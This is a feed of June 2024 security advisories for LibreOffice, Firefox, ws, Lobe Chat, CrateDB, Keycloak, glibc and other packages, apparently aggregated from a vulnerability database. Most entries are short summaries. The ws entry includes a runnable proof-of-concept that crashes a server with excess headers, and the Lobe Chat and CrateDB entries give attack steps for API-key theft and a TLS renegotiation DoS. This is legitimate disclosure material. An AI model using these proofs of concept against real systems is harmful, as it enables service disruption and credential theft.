12.06.2024 03:00:00	oraclelinux	[ELSA-2024-3835] libreoffice security update (important)	[7.1.8.1-12.0.1]- Replace colors with Oracle colors [Orabug: 32120093]- Added the --with-hamcrest option to configure.[7.1.8.1]- Remove Red Hat branding- Change vendor to RESF[1:7.1.8.1-12]- Fix CVE-2023-6185 escape url passed to gstreamer- Fix CVE-2023-6186 check link target protocols[1:7.1.8.1-11]- Resolves: rhbz#2210193 CVE-2023-0950 Array Index UnderFlow in Calc Formula Parsing- Resolves: rhbz#2210197 CVE-2023-2255 libreoffice: Remote documents loaded without prompt via IFrame- Resolves: rhbz#2208510 CVE-2023-1183 libreoffice: Arbitrary File Write[1:7.1.8.1-10]- Fix erroneous libreoffice-ure dependencies[1:7.1.8.1-9]- Resolves: rhbz#2182392 CVE-2022-38745[1:7.1.8.1-8]- Resolves: rhbz#2134759 Untrusted Macros- Resolves: rhbz#2134757 Weak Master Keys- Resolves: rhbz#2134755 Static Initialization Vector- Resolves: rhbz#2134761 Macro URL arbitrary script execution	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3835
13.06.2024 22:39:06	maven	[MAVEN:GHSA-X268-QPG6-W9G2] CrateDB has a Client initialized Session-Renegotiation DoS (moderate)	Summary Client-Initiated TLS Renegotiation Denial of Service (DoS) Vulnerability at Port 4200Details A high-risk vulnerability has been identified where the TLS endpoint (port 4200) permits client-initiated renegotiation. In this scenario, an attacker can exploit this feature to repeatedly request renegotiation of security parameters during an ongoing TLS session. This flaw could lead to excessive consumption of CPU resources, resulting in potential server overload and service disruption. The vulnerability was confirmed using an openssl client where the command 'R' initiates renegotiation, followed by the server confirming with 'RENEGOTIATING'.PoC 1. Connect to the TLS server on port 4200 using an openssl client.2. Initiate a TLS session.3. Send the renegotiation command ('R') multiple times.4. Observe the server response to confirm renegotiation.Impact This vulnerability allows an attacker to perform a denial of service attack by exhausting server CPU resources through repeated TLS renegotiations. This impacts the availability of services running on the affected server, posing a significant risk to operational stability and security.TLS 1.3 explicitly forbids renegotiation, since it closes a window of opportunity for an attack.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-X268-QPG6-W9G2
14.06.2024 01:03:51	maven	[MAVEN:GHSA-4Q22-422G-M4PJ] Elasticsearch StackOverflow vulnerability (moderate)	A flaw was discovered in Elasticsearch, affecting document ingestion when an index template contains a dynamic field mapping of “passthrough” type. Under certain circumstances, ingesting documents in this index would cause a StackOverflow exception to be thrown and ultimately lead to a Denial of Service. Note that passthrough fields is an experimental feature.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4Q22-422G-M4PJ
13.06.2024 17:44:19	ubuntu	[USN-6834-1] H2 vulnerabilities (critical)	H2 could be made to allow arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6834-1
13.06.2024 15:35:18	ubuntu	[USN-6833-1] VTE vulnerability	VTE could be made to consume resources and crash if it displayed speciallycrafted data.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6833-1
13.06.2024 11:32:09	ubuntu	[USN-6832-1] Virtuoso Open-Source Edition vulnerabilities (high)	Open-Source Edition could be made to crash if it received specially craftedinput.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6832-1
13.06.2024 07:57:34	ubuntu	[USN-6829-1] matio vulnerability (medium)	matio could be made to crash if it opened a specially crafted file.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6829-1
13.06.2024 03:00:00	cisa	[CISA-2024:0613] CISA Adds 3 Known Exploited Vulnerabilities to Catalog (critical)	CISA has added 3 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0613
13.06.2024 03:00:00	mozilla	[MFSA-2024-27] Security Vulnerabilities fixed in Firefox for iOS 127 (high)	- CVE-2024-38312: Private tabs could result in residual data related to browsing history in app bundle (moderate)When browsing private tabs, some data related to location history or webpage thumbnails could be persisted incorrectly within the sandboxed app bundle after app termination- CVE-2024-38313: Location URL bar could be visually spoofed with a fake toolbar (high)In certain scenarios a malicious website could attempt to display a fake location URL bar which could mislead users as to the actual website address	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-27
13.06.2024 03:00:00	mozilla	[MFSA-2024-28] Security Vulnerabilities fixed in Firefox ESR 115.12 (high)	- CVE-2024-5688: Use-after-free in JavaScript object transplant (high)If a garbage collection was triggered at the right time, a use-after-free could have occurred during object transplant.- CVE-2024-5690: External protocol handlers leaked by timing attack (moderate)By monitoring the time certain operations take, an attacker could have guessed which external protocol handlers were functional on a user's system.- CVE-2024-5691: Sandboxed iframes were able to bypass sandbox restrictions to open a new window (moderate)By tricking the browser with a <code>X-Frame-Options</code> header, a sandboxed iframe could have presented a button that, if clicked by a user, would bypass restrictions to open a new window.- CVE-2024-5692: Bypass of file name restrictions during saving (moderate)On Windows 10, when using the 'Save As' functionality, an attacker could have tricked the browser into saving the file with a disallowed extension such as <code>.url</code> by including an invalid character in the extension. Note: This issue only affected Windows operating systems. Other operating systems are unaffected.- CVE-2024-5693: Cross-Origin Image leak via Offscreen Canvas (moderate)Offscreen Canvas did not properly track cross-origin tainting, which could be used to access image data from another site in violation of same-origin policy.- CVE-2024-5696: Memory Corruption in Text Fragments (moderate)By manipulating the text in an <code><input></code> tag, an attacker could have caused corrupt memory leading to a potentially exploitable crash.- CVE-2024-5700: Memory safety bugs fixed in Firefox 127, Firefox ESR 115.12, and Thunderbird 115.12 (high)Memory safety bugs present in Firefox 126, Firefox ESR 115.11, and Thunderbird 115.11. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.- CVE-2024-5702: Use-after-free in networking (high)Memory corruption in the networking stack could have led to a potentially exploitable crash.	https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-28
13.06.2024 03:00:00	oraclelinux	[ELSA-2024-3846] python-idna security update (moderate)	[2.10-7.0.1.1]- Rebuild with release bump[2.10-7.1]- Security fix for CVE-2024-3651Resolves: RHEL-33464	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3846
13.06.2024 03:00:00	oraclelinux	[ELSA-2024-3838] ruby security update (moderate)	[3.0.7-162]- Upgrade to Ruby 3.0.7. Resolves: RHEL-35740- Fix HTTP response splitting in CGI. Resolves: RHEL-35741- Fix ReDoS vulnerability in URI. Resolves: RHEL-35742- Fix ReDoS vulnerability in Time. Resolves: RHEL-35743- Fix buffer overread vulnerability in StringIO. Resolves: RHEL-35744- Fix RCE vulnerability with .rdoc_options in RDoc. Resolves: RHEL-35746- Fix arbitrary memory address read vulnerability with Regex search. Resolves: RHEL-35747[3.0.4-161]- Fix OpenSSL.fips_mode and OpenSSL::PKey.read in OpenSSL 3 FIPS. Resolves: RHEL-12724- ssl: use ffdhe2048 from RFC 7919 as the default DH group parameters Related: RHEL-12724[3.0.4-160]- Bypass git submodule test failure on Git >= 2.38.1.- Fix tests with Europe/Amsterdam pre-1970 time on tzdata version 2022b.- Fix for tzdata-2022g.- Fix File.utime test.[3.0.4-160]- Upgrade to Ruby 3.0.4. Resolves: rhbz#2096347- OpenSSL test suite fixes due to disabled SHA1. Resolves: rbhz#2107696- Fix double free in Regexp compilation. Resolves: CVE-2022-28738- Fix buffer overrun in String-to-Float conversion. Resolves: CVE-2022-28739	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3838
13.06.2024 03:00:00	freebsd	[FREEBSD:92CD1C03-2940-11EF-BC02-001B217B3468] Gitlab -- Vulnerabilities (medium)	Gitlab reports: ReDoS in gomod dependency linker ReDoS in CI interpolation (fix bypass) ReDoS in Asana integration issue mapping when webhook is called XSS and content injection when viewing raw XHTML files on iOS devices Missing agentk request validation could cause KAS to panic	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:92CD1C03-2940-11EF-BC02-001B217B3468
14.06.2024 20:24:38	ubuntu	[USN-6817-3] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6817-3
14.06.2024 18:59:05	ubuntu	[USN-6818-3] Linux kernel (NVIDIA) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6818-3
14.06.2024 18:39:24	ubuntu	[USN-6821-4] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6821-4
14.06.2024 03:00:00	debian	[DSA-5710-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5710-1
14.06.2024 10:30:49	almalinux	[ALSA-2024:3820] fence-agents security update (moderate)	fence-agents security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3820
14.06.2024 09:42:30	almalinux	[ALSA-2024:3823] rpm-ostree security update (moderate)	rpm-ostree security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3823
14.06.2024 12:47:46	almalinux	[ALSA-2024:3826] podman security and bug fix update (moderate)	podman security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3826
14.06.2024 16:33:39	almalinux	[ALSA-2024:3835] libreoffice security update (important)	libreoffice security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3835
14.06.2024 09:41:16	almalinux	[ALSA-2024:3837] 389-ds-base security update (important)	389-ds-base security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:3837
15.06.2024 03:00:00	debian	[DSA-5711-1] thunderbird	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5711-1
16.06.2024 03:00:00	debian	[DSA-5713-1] libndp (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5713-1
18.06.2024 01:28:43	npm	[NPM:GHSA-P36R-QXGX-JQ2V] Lobe Chat API Key Leak (moderate)	### SummaryIf an attacker can successfully authenticate through SSO/Access Code, they can obtain the real backend API Key by modifying the base URL to their own attack URL on the frontend and setting up a server-side request.### DetailsThe attack process is described above.![image](https://github.com/lobehub/lobe-chat/assets/36695271/df5e0c3c-af28-45c3-959f-182cc9d06680)### PoCFrontend:1. Pass basic authentication (SSO/Access Code).2. Set the Base URL to a private attack address.3. Configure the request method to be a server-side request.4. At the self-set attack address, retrieve the API Key information from the request headers.Backend:1. The LobeChat version allows setting the Base URL.2. There is no outbound traffic whitelist.### ImpactAll community version LobeChat users using SSO/Access Code authentication, tested on version 0.162.13.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P36R-QXGX-JQ2V
18.06.2024 00:20:45	maven	[MAVEN:GHSA-W877-JFW7-46RJ] DeepJavaLibrary API absolute path traversal (critical)	## SummaryDeepJavaLibrary(DJL) versions 0.1.0 through 0.27.0 do not prevent absolute path archived artifacts from inserting archived files directly into the system, overwriting system files. This is fixed in DJL 0.28.0 and patched in DJL Large Model Inference containers 0.27.0.Impacted versions: 0.1.0 through 0.27.0## PatchesPatched Deep Learning Containers:[v1.1-djl-0.27.0-inf-cpu-full](https://github.com/aws/deep-learning-containers/releases/tag/v1.1-djl-0.27.0-inf-cpu-full)[v1.4-djl-0.27.0-inf-ds-0.12.6](https://github.com/aws/deep-learning-containers/releases/tag/v1.4-djl-0.27.0-inf-ds-0.12.6)[v1.4-djl-0.27.0-inf-trt-0.8.0](https://github.com/aws/deep-learning-containers/releases/tag/v1.4-djl-0.27.0-inf-trt-0.8.0)[v1.3-djl-0.27.0-inf-neuronx-sdk2.18.1](https://github.com/aws/deep-learning-containers/releases/tag/v1.3-djl-0.27.0-inf-neuronx-sdk2.18.1)Patched Library:[v0.28.0](https://github.com/deepjavalibrary/djl/releases/tag/v0.28.0)	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W877-JFW7-46RJ
17.06.2024 22:09:12	npm	[NPM:GHSA-3H5V-Q93C-6H6Q] ws affected by a DoS when handling a request with many HTTP headers (high)	### ImpactA request with a number of headers exceeding the[`server.maxHeadersCount`][] threshold could be used to crash a ws server.### Proof of concept```jsconst http = require('http');const WebSocket = require('ws');const wss = new WebSocket.Server({ port: 0 }, function () { const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`\|~".split(''); const headers = {}; let count = 0; for (let i = 0; i < chars.length; i++) { if (count === 2000) break; for (let j = 0; j < chars.length; j++) { const key = chars[i] + chars[j]; headers[key] = 'x'; if (++count === 2000) break; } } headers.Connection = 'Upgrade'; headers.Upgrade = 'websocket'; headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ=='; headers['Sec-WebSocket-Version'] = '13'; const request = http.request({ headers: headers, host: '127.0.0.1', port: wss.address().port }); request.end();});```### PatchesThe vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e)### WorkaroundsIn vulnerable versions of ws, the issue can be mitigated in the following ways:1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options so that no more headers than the `server.maxHeadersCount` limit can be sent.2. Set `server.maxHeadersCount` to `0` so that no limit is applied.### CreditsThe vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in https://github.com/websockets/ws/issues/2230.### References- https://github.com/websockets/ws/issues/2230- https://github.com/websockets/ws/pull/2231[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-3H5V-Q93C-6H6Q
18.06.2024 01:30:08	npm	[NPM:GHSA-MJ4P-GMHR-92G3] @akbr/update Prototype Pollution (moderate)	akbr update 1.0.0 is vulnerable to Prototype Pollution via update/index.js.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-MJ4P-GMHR-92G3
18.06.2024 01:30:03	npm	[NPM:GHSA-QJ86-V6M7-4QV2] Object Resolver Prototype Pollution (moderate)	apphp js-object-resolver < 3.1.1 is vulnerable to Prototype Pollution via Module.setNestedProperty.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QJ86-V6M7-4QV2
18.06.2024 01:29:53	npm	[NPM:GHSA-J8PX-PJMP-325F] flatten-json Prototype Pollution (moderate)	A Prototype Pollution issue in flatten-json 1.0.1 allows an attacker to execute arbitrary code via module.exports.unflattenJSON (flatten-json/index.js:42)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-J8PX-PJMP-325F
18.06.2024 01:29:48	npm	[NPM:GHSA-JJ58-488V-4RGF] obx Prototype Pollution (moderate)	almela obx before v.0.0.4 has a Prototype Pollution issue which allows arbitrary code execution via the obx/build/index.js:656), reduce (@almela/obx/build/index.js:470), Object.set (obx/build/index.js:269) component.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JJ58-488V-4RGF
17.06.2024 20:35:07	ubuntu	[USN-6835-1] Ghostscript vulnerabilities	Several security issues were fixed in Ghostscript.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6835-1
18.06.2024 00:37:53	npm	[NPM:GHSA-69R2-2FG7-7HF9] Badger Database Prototype Pollution (moderate)	A Prototype Pollution issue in abw badger-database 1.2.1 allows an attacker to execute arbitrary code via dist/badger-database.esm.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-69R2-2FG7-7HF9
18.06.2024 00:37:38	npm	[NPM:GHSA-4XG3-7W7Q-856Q] object-deep-assign Prototype Pollution (moderate)	alexbinary object-deep-assign 1.0.11 is vulnerable to Prototype Pollution via the extend() method of Module.deepAssign (/src/index.js)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4XG3-7W7Q-856Q
18.06.2024 00:29:55	npm	[NPM:GHSA-FG52-5JJJ-28H7] @cdr0/sg Prototype Pollution (moderate)	A Prototype Pollution issue in cdr0 sg 1.0.10 allows an attacker to execute arbitrary code.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FG52-5JJJ-28H7
17.06.2024 17:24:17	ubuntu	[USN-6838-1] Ruby vulnerabilities	Several security issues were fixed in Ruby.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6838-1
17.06.2024 16:12:32	ubuntu	[USN-6837-1] Rack vulnerabilities (high)	Several security issues were fixed in Rack.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6837-1
17.06.2024 16:00:34	ubuntu	[USN-6836-1] SSSD vulnerability (high)	SSSD did not always correctly apply the GPO policy.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6836-1
17.06.2024 03:00:00	oraclelinux	[ELSA-2024-3951] firefox security update (important)	[115.12.0-1.0.1]- Remove upstream references [Orabug: 30143292]- Update distribution for Oracle Linux [Orabug: 30143292]- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.12.0-1]- Update to 115.12.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3951
17.06.2024 03:00:00	oraclelinux	[ELSA-2024-3954] firefox security update (important)	[115.12.0-1.0.1]- Add firefox-oracle-default-prefs.js and remove the corresponding OpenELA file[115.12.0-1]- Update to 115.12.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3954
17.06.2024 03:00:00	oraclelinux	[ELSA-2024-3955] firefox security update (important)	[115.12.0-1.0.1]- Add firefox-oracle-default-prefs.js and remove the corresponding Red Hat file[115.12.0-1]- Update to 115.12.0 build1	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-3955
18.06.2024 00:22:07	maven	[MAVEN:GHSA-HW2C-8XGW-MF57] SonarQube logs sensitive information (moderate)	In SonarQube before 10.4 and 9.9.4 LTA, encrypted values generated using the Settings Encryption feature are potentially exposed in cleartext as part of the URL parameters in the logs (such as SonarQube Access Logs, Proxy Logs, etc).	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HW2C-8XGW-MF57
18.06.2024 00:23:50	npm	[NPM:GHSA-XGQM-WP7W-MGG2] Mattermost Desktop App allows for bypassing TCC restrictions on macOS (low)	Mattermost Desktop App versions <=5.7.0 fail to disable certain Electron debug flags which allows for bypassing TCC restrictions on macOS.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XGQM-WP7W-MGG2
18.06.2024 00:23:18	npm	[NPM:GHSA-HVXG-77MG-VRVP] Mattermost Desktop App Remote Code Execution (moderate)	Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI schemes.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HVXG-77MG-VRVP
19.06.2024 02:24:56	ubuntu	[USN-6818-4] Linux kernel (HWE) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6818-4
18.06.2024 20:47:28	ubuntu	[USN-6793-2] Git vulnerability (critical)	Git could be made to run programs as your login if it clonesa crafted repository.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6793-2
18.06.2024 19:34:47	maven	[MAVEN:GHSA-GMRM-8FX4-66X7] Keycloak: Leak of configured LDAP bind credentials (low)	A vulnerability was found in Keycloak. The LDAP testing endpoint allows changing the Connection URL independently without re-entering the currently configured LDAP bind credentials. This flaw allows an attacker with admin access (permission manage-realm) to change the LDAP host URL ("Connection URL") to a machine they control. The Keycloak server will connect to the attacker's host and try to authenticate with the configured credentials, thus leaking them to the attacker. As a consequence, an attacker who has compromised the admin console or compromised a user with sufficient privileges can leak domain credentials and attack the domain.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-GMRM-8FX4-66X7
18.06.2024 03:00:00	debian	[DSA-5714-1] roundcube	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5714-1
18.06.2024 03:00:00	debian	[DSA-5715-1] composer (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5715-1
18.06.2024 03:00:00	oraclelinux	[ELSA-2024-12442] glibc security update (important)	[2.17-326.0.6.3]- Forward-port Oracle patches to 2.17-326.3 Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> Oracle history: April-28-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.17-326.0.6 - OraBug 35338741 Glibc tunable to disable huge pages on pthread_create stacks Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> February-22-2023 Cupertino Miranda <cupertino.miranda@oracle.com> - 2.17-326.0.4 - OraBug 35107754 Fix range check in do_tunable_update_val Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> May-18-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.17-326.0.2 - Forward-port Oracle patches to 2.17-326. Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> April-27-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.17-325.0.6 - OraBug 33968985 Security Patches - This release fixes CVE-2022-23219, CVE-2022-23218, and CVE-2021-3999 Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> January-7-2022 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.17-325.0.4 - add upstream patch for CR33459693 Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> October-12-2021 Patrick McGehearty <patrick.mcgehearty@oracle.com> - 2.17-325.0.2 - merge el7 u9 errata4 patch with Oracle patches Review-exception: Simple merge - merge el7 u9 errata patch with Oracle patches Review-exception: Simple merge - merge el7 u9 errata patches with Oracle patches Review-exception: Simple merge - merge el7 u9 patches with Oracle patches Review-exception: Simple merge - Four patches to match 3rd patch bundle from Marvell - modify MIPS values in elf/elf.h - add sysdeps/aarch64/sys/ifunc.h - consolidate Linux mmap [BZ-21270] - fix mmap for really large offsets - [Orabug 30778222] Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - [Orabug 28481550/29851177] Make funlockfile/flockfile match tests with _IO_funlockfile and _IO_flockfile. - aarch64 Optimize memcpy for octeonx - aarch64 Add Atomics HWCAP_IMPORTANT - implement allocate_once - Adding Mike Fabian's C.utf-8 patch (C.utf-8 is a unicode-aware version of the C locale) - Marvell Patches to support mips/aarch64 - mips support _ABI64 and STRING_INLINE_unaligned - mips Use HAVE_SA_RESTORER for declaration of restore_rt. - Do not redefine MEMCPY_OK_FOR_FWD_MEMMOVE - mips pread.c remove typo. - mips remove mips64/n32/fallocate.c - add uint64_t for SEM_NWAITERS_SHIFT - Replace sysdeps/mips/preconfigure with current version. - change !_MIPS_ARCH_OCTEON to !defined _MIPS_ARCH_OCTEON - Check for /usr/bin/sh before invoking bash specific cmds - Backport to fix ltp set{re,res}{g,u}id.c tests. - mips Octeon add syncw in atomic.h asm.h - Make mmap64() 64-bit file offsets for n32 - mips Use 'k0' for Octeon1 - Bug 1591 mips/mips64/pthread_spin_unlock.c - mips Bug 1552 fadvise changes - mips user.h delete PAGE_SIZE PAGE_MASK NBPG HOST_STACK_END_ADDR - mips bug 1633 modify debug/Makefile - mips octeon2 optimize atomic compare and exchange - mips Append octeon3 to the machine variable. - ifaddrs netlink request increase buffer size for large messages - mips clean up memcpy.S syntax (no change in prefetching) - Include sysdep.h in sysdeps/aarch64/crti.S - aarch64 rename R_AARCH64 fields based on new ABI - aarch64 Support variable pagesize - mips bug 4380 static glibc syscalls to support cancellation - aarch64 add funwind tables to backtrace - aarch64 define typesizes - mips sqrt code added - Cleanup strcoll_l to match upstream - Add test to check for cache size int overflow - mips correct reserved FCSR bits - mips fpu_control.h standardize capitalization - mips fpu_control.h add FPU_RC_MASK - mips use FPU_RC_MASK in fegetround fesetround - mips inline math lib support functions - mips add strcmp.c - mips revise memset again for Octeon 128byte cache lines - aarch64 define FUTEX_WAIT_REQUEUE_PI - aarch64 Define ABORT_INSTRUCTION - aarch64 fix first cfi_adjust_cfa_offset - mips add section GNU-stack for executable stack - aarch64 Make SSIZE_T_TYPE always signed long - aarch64 define OFF_T_TYPE to be SYSCALL_SLONG_TYPE - aarch64 Handle various MATCHES cases - Change shm_segsz to be __syscall_ulong_t - convert elf/sotruss.ksh to standard Bourne function syntax - aarch64 remove inaccurate comment from sysdep.h - aarch64 Prevent warning in sigcontextinfo.h - aarch64 Prevent warning in jmpbuf-unwind.h - check signal stack before and after swapcontext - aarch64 Add SystemTap probe longjmp and setjmp - aarch64 count_leading_zeros defined - mips improved newlib strcmp.c - fix initial condition for get_nprocs - aarch64: remove asm/ptrace.h in sys includes - elf/pldd.c use scratch_buffer instead of extend_alloca - grp Rewrite to use scratch_buffer - add scratch_buffer to initgroups - add scratch_buffer to getnameinfo - nscd_getgr_r add scratch_buffer - mips Define DT_MIPS_RLD_MAP_REL macro - mips Add ENTRY and END to assembly routines - Makeconfig changes to support include subdirs - mips assembly changes for GP64_REG and GP64_STACK - sunrpc: Do not use alloca in clntudp_call - Improve wide char support - Provide cache/non-cache versions for localedata - CR29749550 [armv5] build failure - Add 3 arm patches to aarch64 tree to avoid future build/merge failures. - Rebase aarch64 patches at 30000 to avoid future conflicts. - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - EL Errata <el-errata_ww@oracle.com> - Add BUS_MCEERR_AR, BUS_MCEERR_AO to sysdeps/unix/sysv/linux/bits/siginfo.h - Add MAP_SHARED_VALIDATE to sysdeps/unix/sysv/linux/bits/mman-linux.h and - sysdeps/unix/sysv/linux/aarch64/bits/mman-linux.h - Add MAP_SYNC to sysdeps/unix/sysv/linux/aarch64/bits/mman.h - Add RTEXT_FILTER_SKIP_STATS - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> Orabug: <29495283> - add Ampere emag to tunable cpu list - add optimized memset for emag - add an ASIMD variant of strlen for falkor - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> Orabug: <2700101> - Reviewed-by: Jose E. Marchesi <jose.marchesi@oracle.com> - bundle of 71 upstream commits to improve malloc correctness and performance - upstream commit 4b5b548c9fedd5e6d920639e42ea8e5f473c4de3 - Fix BZ #15089: malloc_trim always trim for large padding. - upstream commit 51a7380b8968251a49a4c5b0bc7ed1af5b0512c6 - malloc/malloc.c: Avoid calling sbrk unnecessarily with zero - upstream commit 8a35c3fe122d49ba76dff815b3537affb5a50b45 - Use alignment macros, pagesize and powerof2. - upstream commit eab55bfb14f5e1ea6f522d81632ce5a1b8a8c942 - Add missing includes to sysdeps/generic/malloc-sysdep.h. - upstream commit 987c02692a88b8c9024cb99187434aad02c3c047 - malloc: fix comment typo - upstream commit c52ff39e8ee052e4a57676d65a27f09bd0a859ad - * malloc/malloc.c: Fix powerof2 check. - upstream commit af102d9529faee5810fde80dac6337b6148789ad - Remove explicit inline on malloc perturb functions. - upstream commit ca6be1655bd357bf6ac8857fba9b9dce928edbdc - Use ALIGN_DOWN in systrim. - upstream commit 8ba14398e629c1f63b9c91a59a47a713b3cce8bc - Do not macro-expand failed assertion expression [BZ #18604] - upstream commit 400e12265d99964f8445bb6d717321eb73152cc5 - Replace MUTEX_INITIALIZER with _LIBC_LOCK_INITIALIZER in generic code - upstream commit 00d4e2ea3503e6de0f198cd65343f287a51f04db - malloc: Remove arena_mem variable - upstream commit ca135f824b1dbaf43e4a673de7725db76a51b714 - malloc: Remove max_total_mem member from struct malloc_par - upstream commit 59eda029a8a35e5f4e5cd7be0f84c6629e48ec6e - malloc: Remove NO_THREADS - upstream commit b43f552a8a23c0e405ab13a268bee12ada3b7841 - Fix type of parameter passed by malloc_consolidate - upstream commit 8a727af925be63aa6ea0f5f90e16751fd541626b - malloc: Remove malloc hooks from fork handler - upstream commit 4cf6c72fd2a482e7499c29162349810029632c3f - malloc: Rewrite dumped heap for compatibility in __malloc_set_state - upstream commit dea39b13e2958a7f0e75b5594a06d97d61cc439f - malloc: Correct malloc alignment on 32-bit architectures [BZ #6527] - upstream commit 1e8a8875d69e36d2890b223ffe8853a8ff0c9512 - malloc: Correct size computation in realloc for dumped fake mmapped chunks - upstream commit 073f82140c7dbd7af387153c29ac7ac3e882c4ef - malloc_usable_size: Use correct size for dumped fake mapped chunks - upstream commit f88aab5d508c13ae4a88124e65773d7d827cd47b - malloc: Preserve arena free list/thread count invariant [BZ #20370] - upstream commit 5bc17330eb7667b96fee8baf3729c3310fa28b40 - elf: dl-minimal malloc needs to respect fundamental alignment - upstream commit 4bf5f2224baa1590f92f7a26930928fe9f7e4b57 - malloc: Automated part of conversion to __libc_lock - upstream commit c1234e60f975da09764683cddff4ef7e2a21ce78 - Document the M_ARENA_* mallopt parameters - upstream commit 68fc2ccc1aebc15b92e596b2bdc5605da1e25f3c - Remove redundant definitions of M_ARENA_* macros - upstream commit aceb22c1f59231909777f7d0a6b955adbf7096a2 - Remove references to sbrk to grow/shrink arenas - upstream commit e863cce57bff6cb795e6aad745ddf6235bca21ce - malloc: Remove malloc_get_state, malloc_set_state [BZ #19473] - upstream commit 681421f3cac665a82d000d854ae6df1fb3b561a5 - sysmalloc: Initialize previous size field of mmaped chunks - upstream commit e9c4fe93b3855239752819303ca377dff0ed0553 - malloc: Use accessors for chunk metadata access - upstream commit ae9166f2b8936304ea347a98519372804963447f - malloc: Update comments about chunk layout - upstream commit 